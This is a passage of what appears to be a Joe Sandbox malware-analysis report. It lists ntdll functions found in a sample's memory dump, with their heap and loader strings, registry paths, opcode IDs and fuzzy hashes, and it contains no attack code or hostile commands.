                                      • Opcode ID: 7fe6a9c231d5374a63ea5c21d021e0dce341cec86b50de84a63e137d53ba9b7e
                                      • Instruction ID: a20ef523ce855dc25a7f955d5a35281e837cbe675b4ef3bd22f1556d90cec823
                                      • Opcode Fuzzy Hash: 7fe6a9c231d5374a63ea5c21d021e0dce341cec86b50de84a63e137d53ba9b7e
                                      • Instruction Fuzzy Hash: 42F12A76E00619EBCB12DF98C984ADEFBF9FF18B50F15406EE501E7254D771AA018BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017B7010 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                      • API String ID: 0-3178619729
                                      • Opcode ID: 7b2c229d2bc2dbc4b6095727d9c68e7e049c66b740759944624629987794e2a0
                                      • Instruction ID: 209b9aec44b18001c4ca61fe2db5c3a07ec46d50768c0c8038aeee14a38c49f1
                                      • Opcode Fuzzy Hash: 7b2c229d2bc2dbc4b6095727d9c68e7e049c66b740759944624629987794e2a0
                                      • Instruction Fuzzy Hash: 51139C70A00655CFDB29CF68C890BE9FBB5FF88304F1481A9D949AB386D734A945CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017AA320 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                      • API String ID: 0-379654539
                                      • Opcode ID: 7cda5c51a0472bf93b91825d385919ce1cfe781b4cd288e799cae7b2c2306ce0
                                      • Instruction ID: 583d8e151c2cdfe7a14bb59e8672e0015f76319a6485df5231f0457a22390138
                                      • Opcode Fuzzy Hash: 7cda5c51a0472bf93b91825d385919ce1cfe781b4cd288e799cae7b2c2306ce0
                                      • Instruction Fuzzy Hash: 25C1AB70108386CFD752CF58C448B6AF7E5BF84704F448AAAF985CB291E774CA49CB56
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0179F5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                      • API String ID: 2994545307-2586055223
                                      • Opcode ID: b67b791ad8fa55f0f6849a3d4739079a78f7d094f3923d2c3c6dbd222d9ccb00
                                      • Instruction ID: 499942f304846a6567d0987936a48c7e3cdd7c65a165f9a0161bd8f44938d2b2
                                      • Opcode Fuzzy Hash: b67b791ad8fa55f0f6849a3d4739079a78f7d094f3923d2c3c6dbd222d9ccb00
                                      • Instruction Fuzzy Hash: 4B61C1712047819FD722DB68D848F6BFBE8EF84750F05045DFA558B2A1DB34E944C7A2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017C23AA Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                      Download Yara Rule
                                      Strings
                                      • minkernel\ntdll\ldrinit.c, xrefs: 0180A908
                                      • LdrpDynamicShimModule, xrefs: 0180A8FE
                                      • apphelp.dll, xrefs: 017C23B2
                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0180A8F8
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                      • API String ID: 0-176724104
                                      • Opcode ID: 7486194fa59852881e3ab390af183e5ddda7a37c359eb8628a840623ca9962b7
                                      • Instruction ID: 1a8444f5dbee2b7fb3d69729725e57426abaf4c5a8e321a2721cd52b5a8374d7
                                      • Opcode Fuzzy Hash: 7486194fa59852881e3ab390af183e5ddda7a37c359eb8628a840623ca9962b7
                                      • Instruction Fuzzy Hash: 88314A75740304ABDB369F6DDC85A6AB7B4FB80B10F19001DE910EB289D7B05B42CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017990F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                      • API String ID: 2994545307-1391187441
                                      • Opcode ID: 0ad923c467475e21121ee564ba536bbbe5aee2119028e99969bc7172b9c4506d
                                      • Instruction ID: f2109ff7764bf0a7c47d869dd960f6ef2150372a22d87f59729bd14ab0cea2fa
                                      • Opcode Fuzzy Hash: 0ad923c467475e21121ee564ba536bbbe5aee2119028e99969bc7172b9c4506d
                                      • Instruction Fuzzy Hash: FA31E1B2A40105EFDF11DB59D888F9AFBB8FF84A70F14405DE615AB291D770EE48CA60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 018491B0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $ $0
                                      • API String ID: 0-3352262554
                                      • Opcode ID: 6c3fe871f6015e581ffbfaca4796b59c3683c7e733b6dfed1ff2c8e4f05babfc
                                      • Instruction ID: 4da84aa9d168e4707b8da94fb681ff024fccd77afb5a8223b1d026b678f44185
                                      • Opcode Fuzzy Hash: 6c3fe871f6015e581ffbfaca4796b59c3683c7e733b6dfed1ff2c8e4f05babfc
                                      • Instruction Fuzzy Hash: 473205B1A083858FD760CF68C484B5BBBE5BB88348F04492EF599C7251DB75EA48CB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017A13C0 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                      Download Yara Rule
                                      Strings
                                      • HEAP: , xrefs: 017A14F6
                                      • HEAP[%wZ]: , xrefs: 017A1672
                                      • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 017A1688
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                      • API String ID: 0-3178619729
                                      • Opcode ID: d58eb31a0495597e8dac20d2a259e7bc69b7d8a68d936887eaa9d04471d9939b
                                      • Instruction ID: ba564f07069f42a7cde9ff0587d81ba026eabdba9ac3f31138806709b92567ab
                                      • Opcode Fuzzy Hash: d58eb31a0495597e8dac20d2a259e7bc69b7d8a68d936887eaa9d04471d9939b
                                      • Instruction Fuzzy Hash: F3E1E131A046459FEB29CF2CC45567AFBF1EF88310F98869DE996CB246DB34E940CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0179A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: FilterFullPath$UseFilter$\??\
                                      • API String ID: 0-2779062949
                                      • Opcode ID: c528ed504cbf6c1d5f9a4d20b9b5451d478d7f737bad2a1d1b32d0d3da37902c
                                      • Instruction ID: 24d59b0c91d2986f2a1228dc004e7de5c4f7c8a5ba656e5eb13e558ce2673c94
                                      • Opcode Fuzzy Hash: c528ed504cbf6c1d5f9a4d20b9b5451d478d7f737bad2a1d1b32d0d3da37902c
                                      • Instruction Fuzzy Hash: B5A15C729416299BDF22DF68CC88B9AF7B8EF08710F1005E9DA09A7250D7349EC4CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017AB3A0 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                      • API String ID: 0-373624363
                                      • Opcode ID: 6e0c430347165cc1130c6f65096a894ecba1329f7be377824b4b6e0612a66da7
                                      • Instruction ID: dea6d1bb2c737dc409e2cfa7b009b7e4a20ea8b41fb6c49e0911bd92605b6711
                                      • Opcode Fuzzy Hash: 6e0c430347165cc1130c6f65096a894ecba1329f7be377824b4b6e0612a66da7
                                      • Instruction Fuzzy Hash: F091D371A05219CFEB26CF59C8507ADBBB1FF81314F648299ED51AB3D0D7789A80CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0187B3FC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                      Download Yara Rule
                                      Strings
                                      • TargetNtPath, xrefs: 0187B4EF
                                      • GlobalizationUserSettings, xrefs: 0187B4F4
                                      • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0187B4EA
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                      • API String ID: 0-505981995
                                      • Opcode ID: ea1365d1a38cfd75d0a858f7cf9d0f6e2fcf38cf4fc32bc473b6402873d568ad
                                      • Instruction ID: 84dbc495ee5ba4edf3f4eca05366db186e34a3abf8264c65608ac5905a296f7e
                                      • Opcode Fuzzy Hash: ea1365d1a38cfd75d0a858f7cf9d0f6e2fcf38cf4fc32bc473b6402873d568ad
                                      • Instruction Fuzzy Hash: B3615D72941629ABDB21DF54DC88BEABBB9AF18710F0101E9E608E7250D774DF84CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017C1544 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                      Download Yara Rule
                                      Strings
                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 0180A4EF
                                      • minkernel\ntdll\ldrmap.c, xrefs: 0180A500
                                      • LdrpCompleteMapModule, xrefs: 0180A4F6
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                      • API String ID: 0-1676968949
                                      • Opcode ID: a1499bcc4e4e3ffe7b55901ad628179961cd968bde8e125cfecbbe6ae80d089c
                                      • Instruction ID: d424fbab108f8bea217dcc1d79c521b6f2a7b2144c8da75df5c40c8e491b0d63
                                      • Opcode Fuzzy Hash: a1499bcc4e4e3ffe7b55901ad628179961cd968bde8e125cfecbbe6ae80d089c
                                      • Instruction Fuzzy Hash: EE510530A00745DBE726DB5CD984B26BBE4BB50B14F6805ACFA52DB6D2D734EA40CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0179753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                      • API String ID: 0-1151232445
                                      • Opcode ID: 829ae3b79059ecc4b9f883061b0812390d746fc0cbcef0c128e7f1c63d67217f
                                      • Instruction ID: c00ca65fa9b1384bf9f9ed5eb8d756411b6d241ca553b3116d7e7ac7afc40dd8
                                      • Opcode Fuzzy Hash: 829ae3b79059ecc4b9f883061b0812390d746fc0cbcef0c128e7f1c63d67217f
                                      • Instruction Fuzzy Hash: 1041F2302502409FEF29CF1CD0D6B66FBE0AF09704F1844AED68ACB656C7A5D849CF52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0182B264 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                      Download Yara Rule
                                      Strings
                                      • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0182B302
                                      • GlobalFlag, xrefs: 0182B35F
                                      • @, xrefs: 0182B340
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                      • API String ID: 0-4192008846
                                      • Opcode ID: 5d0725bebe738e995d5be1e7821bf4cbe9ccd22b174da0ebf65334cce3ffb8a0
                                      • Instruction ID: c558fa453c53e97e08de69cddce8198305eddaa020019bd0e27c7b6a0f85f209
                                      • Opcode Fuzzy Hash: 5d0725bebe738e995d5be1e7821bf4cbe9ccd22b174da0ebf65334cce3ffb8a0
                                      • Instruction Fuzzy Hash: 65314DB1E01219AEDB11EF94CC88BEEFBBCEF48744F440469EA01E7151E7749B408BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017E1230 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                      Download Yara Rule
                                      Strings
                                      • BuildLabEx, xrefs: 017E12CF
                                      • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 017E123B
                                      • @, xrefs: 017E1265
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                      • API String ID: 0-3051831665
                                      • Opcode ID: 76fdcbd9b367098e7fb5645128ea4a69145ed6579749cf69a878581d9d350b78
                                      • Instruction ID: ac185d8aded7bbdb3edb5022b999e6fc3050d51f2d953bead70bafc746c6a7c8
                                      • Opcode Fuzzy Hash: 76fdcbd9b367098e7fb5645128ea4a69145ed6579749cf69a878581d9d350b78
                                      • Instruction Fuzzy Hash: 0231AFB2E0021AABCB129B94CC49EEEFBFDEB58714F404525E615A7260E770DA059B90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0186A012 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: `$`
                                      • API String ID: 0-197956300
                                      • Opcode ID: 4039684f2bd112405ba1fb1b0da043d8514fefdd62c59bf58927ccce99228a94
                                      • Instruction ID: 922b3168edc0e55a03912a20d9d38bd1adccb323d23c93bbd6c3932b96feb9fe
                                      • Opcode Fuzzy Hash: 4039684f2bd112405ba1fb1b0da043d8514fefdd62c59bf58927ccce99228a94
                                      • Instruction Fuzzy Hash: 72C1F6312043469BE728CF28C941B6BBBE9FF94318F144A2DF696DB291D7B5D604CB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0181E3B2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: Legacy$UEFI
                                      • API String ID: 2994545307-634100481
                                      • Opcode ID: b4bc8071c5b2955c78f365b7d24aab9811875cce0a8decb39468fb02690aa270
                                      • Instruction ID: b9391a882e17f6a5f4d8b46247975c8eb7272711830d0c7aceec9b26d90decdf
                                      • Opcode Fuzzy Hash: b4bc8071c5b2955c78f365b7d24aab9811875cce0a8decb39468fb02690aa270
                                      • Instruction Fuzzy Hash: C06172B2A406199FDB15DFA8C844BADBBF9FB48704F14442DEA49EB255E730DA40CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017AA223 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                      Download Yara Rule
                                      Strings
                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 017AA25B
                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 017AA269
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                      • API String ID: 0-2876891731
                                      • Opcode ID: 093b24eb424f6aa39e9a40b7b48a0d2fa58562a7a0598d8c683cf81f8a057ea1
                                      • Instruction ID: a17aa4fd0bee89fbb1688078c582c84432593f0aaabb379ad9a279637b3abc49
                                      • Opcode Fuzzy Hash: 093b24eb424f6aa39e9a40b7b48a0d2fa58562a7a0598d8c683cf81f8a057ea1
                                      • Instruction Fuzzy Hash: F941CF31A04659DBEB22CF5DC884B69BBB5FFD4700F1441A5ED04DB2A1E7B5DA40CB50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017D324E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: .Local\$@
                                      • API String ID: 0-380025441
                                      • Opcode ID: c72a4809c7e1b42c84178c1f2f9592d40b54c115b8cdea7e0e7bdfe9ef9de1d6
                                      • Instruction ID: ab2c6d1113d10e45e8fed307824f0aca7eae5039c1b5c2fcddb4de3a4a79e815
                                      • Opcode Fuzzy Hash: c72a4809c7e1b42c84178c1f2f9592d40b54c115b8cdea7e0e7bdfe9ef9de1d6
                                      • Instruction Fuzzy Hash: 71316EB25483059FD721DF28C984AABFBF8FB98654F04092EF99593250DB34DD048B93
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017D3460 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                      Download Yara Rule
                                      Strings
                                      • RtlpInitializeAssemblyStorageMap, xrefs: 01812976
                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 0181297B
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                      • API String ID: 0-2653619699
                                      • Opcode ID: 93e3f789ef7b3f680c05686977e1604063d0e06bcb6ba7945e7dcb448a66848a
                                      • Instruction ID: 88610aec110d0edc1d1d0bb48001600a374da861147311e682c22977671ceeea
                                      • Opcode Fuzzy Hash: 93e3f789ef7b3f680c05686977e1604063d0e06bcb6ba7945e7dcb448a66848a
                                      • Instruction Fuzzy Hash: 6D112CB6B00208ABE7268E4CCD40F7AB6BEEB84B54F2480697604DB244D674CE0087A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017A72D0 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d29e7c5abf2d563e3097e4a8230b253a38ea90a5d22ee2c51e6f5a887948cc8e
                                      • Instruction ID: 6e4ca6c2a338964310ffaae727ee7d903048758035b5ea1867c95dfc164c0357
                                      • Opcode Fuzzy Hash: d29e7c5abf2d563e3097e4a8230b253a38ea90a5d22ee2c51e6f5a887948cc8e
                                      • Instruction Fuzzy Hash: E6A15771608342CFC729CF28C484A2AFBE5BFD8704F654A6DE5858B351E731EA45CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017D424B Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: @
                                      • API String ID: 0-2766056989
                                      • Opcode ID: 2dba6c1be9cacb8ff399f37c6a42d132e3d3fe55dd0bc331e6b021987c003d8d
                                      • Instruction ID: a6ed840c28a6990275baea879c667e10777ce778e620f5c34fb0397ca5b2eae8
                                      • Opcode Fuzzy Hash: 2dba6c1be9cacb8ff399f37c6a42d132e3d3fe55dd0bc331e6b021987c003d8d
                                      • Instruction Fuzzy Hash: 9F516A725047119BC321DF19C844A6BFBF9FF48710F00892AFA9597690E7B4E944CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0181C3F0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: BinaryHash
                                      • API String ID: 0-2202222882
                                      • Opcode ID: ec0b3aa9c2543dc7d7a8080cbf94e7747239144b8114fb93f538815fa08005e8
                                      • Instruction ID: 47736f9bed69b748f213bd27a18ce04fe471b5728fee9ba165cc26c316b85f92
                                      • Opcode Fuzzy Hash: ec0b3aa9c2543dc7d7a8080cbf94e7747239144b8114fb93f538815fa08005e8
                                      • Instruction Fuzzy Hash: 754181F294012DABDB21DA54CC84FDEB7BCAB44718F0045A5EB08AB145DB309F88CF95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 018285EA Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                      Download Yara Rule
                                      Strings
                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0182861E
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                      • API String ID: 0-702105204
                                      • Opcode ID: 5eecb4897e7c4e52d4c0cd713adc3f618313d6afaeadaf22dcdb9e8dbbffe5e7
                                      • Instruction ID: 939e27ae9099fe24f878accfccaa9e379f070d0aa06659801d867bcb186d371d
                                      • Opcode Fuzzy Hash: 5eecb4897e7c4e52d4c0cd713adc3f618313d6afaeadaf22dcdb9e8dbbffe5e7
                                      • Instruction Fuzzy Hash: 730147312002359FEF376E59D88CE267FA5EF82754F08012EF20683551CB28AAC0CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017F734A Relevance: .7, Instructions: 705COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d42e9059ad2b41ed869fa6cd34590e38be547c6db060ba1333baf9c045da76c8
                                      • Instruction ID: c0382b3ac7023bcc37aec3085e4beaf6baba4828d3c20b29e1a578ac37ec2be2
                                      • Opcode Fuzzy Hash: d42e9059ad2b41ed869fa6cd34590e38be547c6db060ba1333baf9c045da76c8
                                      • Instruction Fuzzy Hash: 3B42C171A006568FDB19CF5DC880ABEFBB2FF88314B24855DDA56AB341D734E942CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017CB220 Relevance: .6, Instructions: 629COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3cff745ebe7983bcd17057bd754b6dd337a4359244b677519b2cca6f8965ee5b
                                      • Instruction ID: 34fd7ed118576ce83e3620cb56b18ccd55f19804c62e15614e397a3d1129be51
                                      • Opcode Fuzzy Hash: 3cff745ebe7983bcd17057bd754b6dd337a4359244b677519b2cca6f8965ee5b
                                      • Instruction Fuzzy Hash: 0B328E72E002199BDF14CFA8D895BAEFBB5FF58B44F18006DE905AB391E7359901CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 017A6530 Relevance: .4, Instructions: 383COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1322759812.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_1770000_2FcJgghyXg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a3faf9ff4d0abf0da150cbc97aa33518a183a095ca187083f3aede115b553adc
                                      • Instruction ID: 5bcb8055fc09f0b59300faf0fee564655d51894a1f1072cb4a1d4d23658725b9
                                      • Opcode Fuzzy Hash: a3faf9ff4d0abf0da150cbc97aa33518a183a095ca187083f3aede115b553adc
                                      • Instruction Fuzzy Hash: F6E179716093428FC715CF28C494A6AFBE0BFC8314F598A6DF59987352EB31E905CB92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01798347 Relevance: .4, Instructions: 380COMMON
                                      Download Yara Rule
                                      Memory Dump Source
